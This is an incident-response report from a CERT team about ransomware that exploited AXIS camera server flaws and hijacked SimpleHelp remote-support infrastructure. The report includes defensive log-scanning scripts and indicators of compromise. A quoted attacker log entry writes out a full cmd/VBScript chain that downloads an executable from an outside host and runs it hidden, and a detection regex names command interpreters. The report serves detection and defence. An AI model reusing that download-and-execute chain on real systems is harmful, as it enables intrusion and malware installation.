How Modern Ransomware Hijacks Trusted Infrastructure
Insights from a real attack investigation by Northwave CERT

Investigating Emerging Ransomware Tactics
Ransomware attacks often follow a familiar pattern: exploit a vulnerability, move laterally through the network, deploy encryption, and demand payment.
But, in a recent incident response handled by Northwave’s Computer Emergency Response Team (NW-CERT), our experts uncovered a more subtle, stealthy tactic. After exploiting a vulnerable system to pivot into the organisation, the threat actor used vulnerable legitimate infrastructure to keep persistent access.
In this report, NW-CERT shares insights from the investigation and IoCs to help security teams recognise similar patterns and prevent threat actors from turning trusted systems into controlled footholds.
Initial access through not-yet-observed exploitation
The threat actor gained initial access through an AXIS camera server affected by two known vulnerabilities: CVE‑2025‑30026 (authentication bypass) and CVE‑2025‑30023 (remote code execution).
At the time of the incident, we had not observed public reporting of these vulnerabilities being exploited in the wild. We did, however, find several publications that discussed how such vulnerabilities could be exploited in practice. As highlighted in reports published in August 2025 here and here, specific indicators may appear in logs when exploitation occurs.
When reviewing the logs located in 'C:\ProgramData\Axis Communications\AXIS Camera Station\Core\Server\Logs\' for similar indicators, we identified a suspicious session being opened. The log entry contained the following record:
Opened <> - Opened id://id/%EF%BF%BD%04%00%00
This session ID and format differed from previous open sessions seen in the logs, suggesting possible manipulation. This gave us an interesting clue. Upon closer analysis, we discovered this session contained additional data that suggested exploitation activity. The log entry included the following request structure and showed that the vulnerable port 55752 on the AXIS server was used for connection:
{"Service":"SessionFacade","Method":"LogOnAsync","Parameters":{"uri":"net.tcp://'':55752"…"MethodName":"Start".."$values":["cmd.exe","/c echo Set x=CreateObject(\"Microsoft.XMLHTTP\"):x.Open \"GET\",\"https://www.<domain1>[.]com/access/Remote Access-windows64-online.exe?language=en&...&hostname=http://<ip1>&ie=ie.exe\",0:x.Send:If x.Status=200 Then Set s=CreateObject(\"ADODB.Stream\"):s.Open:s.Type=1:s.Write x.responseBody:s.SaveToFile \"%temp%//up.exe\",2:s.Close:Set w=CreateObject(\"WScript.Shell\"):w.Run \"%temp%//up.exe\",0:End If >dl.vbs & cscript //nologo dl.vbs & del dl.vbs/n"]},
As can be seen in the log entry, we not only observed the threat actor reaching the vulnerable port, but also a whole chain of commands. It was an intriguing breadcrumb and one we could not easily ignore. So, we took the opportunity to dig deeper to better understand the threat actor’s techniques.
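The two clues above, the malformed session ID and a LogOnAsync record carrying a command interpreter, can be turned into a simple log scanner. The script below is an added example written for this report, not Northwave's or Axis's own tooling; the sample lines are constructed to resemble the quoted records, the session-ID check assumes that normal AXIS session IDs percent-decode to printable text (so control bytes or a U+FFFD replacement character are treated as anomalous), and the interpreter list is an assumption based on the cmd.exe/cscript chain quoted in the report.

```python
"""Scan AXIS Camera Station server log lines for the two exploitation clues discussed above."""
import re
import urllib.parse

# Constructed sample lines modelled on the records quoted in the report (not real log data).
SAMPLE_LOG = """\
2025-08-01 10:00:01 Opened <> - Opened id://id/3f2a9c1e-7b4d-4e1a-9c2b-0c8e5d6f7a8b
2025-08-01 10:05:12 Opened <> - Opened id://id/%EF%BF%BD%04%00%00
2025-08-01 10:05:13 {"Service":"SessionFacade","Method":"LogOnAsync","Parameters":{"uri":"net.tcp://'':55752","MethodName":"Start","$values":["cmd.exe","/c echo Set x=CreateObject(Microsoft.XMLHTTP) >dl.vbs & cscript //nologo dl.vbs & del dl.vbs"]}}
2025-08-01 10:07:00 {"Service":"SessionFacade","Method":"LogOnAsync","Parameters":{"uri":"net.tcp://'':55752","MethodName":"Start","$values":["ACS"]}}
"""

SESSION_RE = re.compile(r"Opened id://id/(\S+)")
LOGON_RE = re.compile(r'"Method":"LogOnAsync"')
# Assumed list of interpreters/paths that should never appear in a LogOnAsync parameter list.
INTERPRETER_RE = re.compile(r"cmd\.exe|cscript|wscript|powershell|%temp%", re.IGNORECASE)
PORT_RE = re.compile(r":55752\b")  # port named in the report as the one reached during exploitation


def session_id_is_suspicious(token: str) -> bool:
    """Percent-decode a session ID and flag control bytes, invalid UTF-8 or U+FFFD.

    Assumption: legitimate session IDs decode to printable text (e.g. a GUID)."""
    raw = urllib.parse.unquote_to_bytes(token)
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return True
    return any(ord(ch) < 0x20 or ch == "\ufffd" for ch in text)


def scan_axis_log(text: str) -> list[dict]:
    """Return one finding per line that shows either clue; regex-based so truncated records still match."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = SESSION_RE.search(line)
        if m and session_id_is_suspicious(m.group(1)):
            findings.append({"line": lineno, "reason": "malformed session id", "detail": m.group(1)})
        hit = INTERPRETER_RE.search(line)
        if LOGON_RE.search(line) and hit:
            reason = "LogOnAsync carrying a command interpreter"
            if PORT_RE.search(line):
                reason += " via port 55752"
            findings.append({"line": lineno, "reason": reason, "detail": hit.group(0)})
    return findings


if __name__ == "__main__":
    for f in scan_axis_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['reason']} ({f['detail']})")
```

Run it against the files under the Logs directory named above; the session-ID check is the cheaper of the two and is worth keeping even on servers where the LogOnAsync record is not retained.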
SimpleHelp calling for help?
In most ransomware cases, we see that after successful initial access, threat actors use legitimate Remote Monitoring and Management (RMM) tools such as AnyDesk to maintain persistence. This is a common pattern:
- obtain initial access
- install an RMM agent
- establish connection to a central remote management server
- continue the intrusion from there
However, in this case, we observed a different scenario.
We saw in the AXIS logs that the AXIS server was reaching out to <domain1>[.]com to download and execute filename ‘up[.]exe’. Analysis of this file showed that it was a SimpleHelp installer. Once executed, this installer connected to <ip1>. We validated this, identifying it as a legitimate SimpleHelp server operated by a US‑based company. As such, on the surface, this looked like a normal installation of a legitimate remote‑support agent, connecting to a legitimate SimpleHelp server. If anything, we hypothesised the threat actor tried to blend in by leveraging a legitimate remote-support infrastructure. However, hypotheses alone are not conclusive findings. And, we know from experience that one single log source rarely tells the whole story.
So, we kept digging.
After combing through several log sources, including the SimpleHelp session logs and traffic logs, we came across another IP address. This IP address was not of the legitimate remote-support infrastructure. And yet, it had been connecting to the AXIS server every single day. When we put that IP address through our threat intelligence sources, it lit up immediately: flagged as malicious in multiple feeds.
That is when we could clearly see the full picture. What the threat actor was actually doing was far more subtle and clever than just dropping an RMM tool. The initial SimpleHelp server itself had multiple weaknesses (CVE-2024-57726, CVE-2024-57727, and CVE-2024-57728) that the threat actor most likely used to gain access to the server. Once access is obtained, the legitimate but vulnerable server could be used for illegitimate activity, as observed.
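The pivot that exposed the second server was a host contacting the AXIS server every single day, which then lit up in threat-intelligence feeds. The script below shows that correlation as an added example written for this report (not Northwave's own tooling): it aggregates a connection log per destination, flags destinations seen on nearly every day in the window, skips an allowlist of known RMM servers, and marks hits found in a threat feed. The traffic lines are constructed; 198.51.100.10 and 203.0.113.7 are documentation-range stand-ins for <ip1> and an unrelated host, while 146.70.41.131 is the actor's SimpleHelp server from the IoC list; the log format and the "seen on 90% of days" threshold are assumptions.

```python
"""Find destinations a server contacts every day, then check them against a threat feed."""
from collections import defaultdict
from datetime import date, timedelta
import re

LEGIT_RMM = "198.51.100.10"   # stand-in for <ip1>, the legitimate SimpleHelp server
ACTOR_RMM = "146.70.41.131"   # threat actor's SimpleHelp server listed in the IoCs
OTHER = "203.0.113.7"         # stand-in for an unrelated host seen only occasionally


def build_sample_log(days: int = 7) -> str:
    """Constructed traffic log: daily check-ins to both RMM servers, two visits to OTHER."""
    lines = []
    start = date(2025, 7, 1)
    for i in range(days):
        d = start + timedelta(days=i)
        lines.append(f"{d}T03:14:00Z src=10.0.5.20 dst={LEGIT_RMM} dport=443 proto=tcp")
        lines.append(f"{d}T{(7 + i) % 24:02d}:02:00Z src=10.0.5.20 dst={ACTOR_RMM} dport=443 proto=tcp")
        if i in (1, 4):
            lines.append(f"{d}T12:00:00Z src=10.0.5.20 dst={OTHER} dport=80 proto=tcp")
    return "\n".join(lines)


# Assumed line layout: ISO timestamp, then key=value fields including dst=<ip>.
LINE_RE = re.compile(r"^(\d{4}-\d{2}-\d{2})T\S+ src=\S+ dst=(\S+)")


def days_per_destination(log_text: str) -> dict:
    """Map each destination to the set of calendar days on which it was contacted."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            seen[m.group(2)].add(date.fromisoformat(m.group(1)))
    return seen


def find_daily_beacons(log_text: str, allowlist: set, threat_feed: set, min_fraction: float = 0.9) -> dict:
    """Return non-allowlisted destinations seen on at least min_fraction of the days in the log,
    annotated with whether the threat feed knows them. The window is the set of distinct days
    present in the log (assumption)."""
    seen = days_per_destination(log_text)
    window = len(set().union(*seen.values())) if seen else 0
    findings = {}
    for dst, days in seen.items():
        if dst in allowlist or window == 0:
            continue
        if len(days) / window >= min_fraction:
            findings[dst] = {
                "days_seen": len(days),
                "window_days": window,
                "on_threat_feed": dst in threat_feed,
            }
    return findings


if __name__ == "__main__":
    for dst, info in find_daily_beacons(build_sample_log(), {LEGIT_RMM}, {ACTOR_RMM}).items():
        print(dst, info)
```

Without the allowlist the legitimate SimpleHelp server is flagged as well, which is exactly the situation described above: a daily RMM check-in looks normal until the destination is compared with the infrastructure you actually expect and with what the feeds say.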
Here's a quick summary of how the ransomware attack worked:
- The threat actor exploited AXIS vulnerabilities to run code.
- That code downloaded and executed a legitimate SimpleHelp installer on the AXIS server.
- The installer connected to a vulnerable SimpleHelp server.
- The threat actor exploited the vulnerable SimpleHelp server to obtain access to the AXIS server.
- The threat actor replaced the vulnerable SimpleHelp server with their own malicious SimpleHelp server.
- The victim’s AXIS server pivoted over to the malicious SimpleHelp infrastructure.
- The malicious SimpleHelp server began connecting with the victim’s AXIS server daily — long before the ransomware was deployed.
This redirection technique essentially gave the threat actor a way to slip in quietly using a legitimate installer as the trojan horse, before switching to their own Command and Control setup.

What can we learn from this ransomware attack?
Threat actors are constantly evolving their tactics. This latest case highlights three important developments in modern ransomware operations:
- Known vulnerabilities can be weaponised even before public exploitation is widely reported.
- Legitimate remote management tools can be abused in ways that blend almost perfectly into normal operations.
- Infrastructure you trust can be quietly repurposed against you, without immediately triggering suspicion.
These days, threat actors actively scan for older or newly disclosed vulnerabilities and may operationalise them before reporting catches up. Advances in adversarial AI tools are giving threat actors an advantage with fast, non-stop vulnerability scanning. That is why waiting for confirmed public exploitation is no longer a safe strategy. Your organisation can easily become the first visible victim.
Proactive patching is critical but with an average of more than 100 vulnerabilities disclosed daily, prioritisation is one of the biggest challenges security teams face. Combining expert vulnerability management with actionable cyber threat intelligence enables organisations to focus on their specific business risks. Equally important is continuous monitoring. A mature 24/7 Security Operations Centre (SOC) can detect subtle anomalies and take immediate action to neutralise threats.
In conclusion, we are seeing many different ways that ransomware is shifting from loud disruption to quiet control. Recognising how trusted infrastructure can be turned against you is now fundamental to true cyber resilience.
Want deeper insights into emerging ransomware tactics? Northwave partnered with cyber insurance provider Marsh on an in-depth report covering the latest developments in the ransomware ecosystem and proven approaches to strengthening cyber resilience.

IoCs
Files
- up.exe — SimpleHelp installer dropped via exploitation
- dl.vbs — temporary downloader script
Domains
- <domain1>[.]com — legitimate SimpleHelp domain
IPs
- <ip1> — legitimate SimpleHelp server
- 146.70.41[.]131 — threat actor’s SimpleHelp server, connecting daily
- 91.199.163[.]108 — IP address used to exploit AXIS server
Log Clues
- Suspicious AXIS session ID: Opened <> - Opened id://id/%EF%BF%BD%04%00%00
- Remote commands launching cmd.exe to pull and run up.exe